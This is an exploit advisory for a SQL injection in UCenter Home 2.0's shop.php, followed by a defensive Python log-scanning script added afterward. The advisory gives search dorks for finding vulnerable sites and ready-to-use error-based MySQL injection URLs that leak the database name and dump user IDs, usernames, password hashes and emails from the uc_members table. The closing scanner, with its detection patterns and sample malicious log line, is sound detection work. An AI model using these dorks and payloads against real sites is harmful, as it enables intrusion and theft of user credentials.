__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okey.

Edit the DB name : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
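
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Detection : an added example, not part of the original advisory. Because shopid is a numeric id, any request to shop.php?ac=view whose decoded shopid is not a plain integer is worth reviewing; the script below scans access-log lines for that and names the error-based constructs it finds. The log format, the sample lines and all function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructs seen in the error-based payloads on this page.
MARKERS = {
    "information_schema": re.compile(r"information_schema", re.I),
    "floor(rand())": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "concat()": re.compile(r"concat\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_shopid(url):
    """Return None if shopid is absent or a plain integer, else (value, markers)."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes values
    if "view" not in params.get("ac", []):
        return None
    for value in params.get("shopid", []):
        if not re.fullmatch(r"[0-9]+", value):
            return value, [name for name, rx in MARKERS.items() if rx.search(value)]
    return None

def scan(lines):
    """Return (line number, decoded shopid, markers) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        result = inspect_shopid(match.group(1)) if match else None
        if result:
            hits.append((number, *result))
    return hits

# Constructed sample log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 911',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /space.php?uid=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with an empty marker list (a stray quote, for instance) is still a non-integer shopid and usually indicates probing.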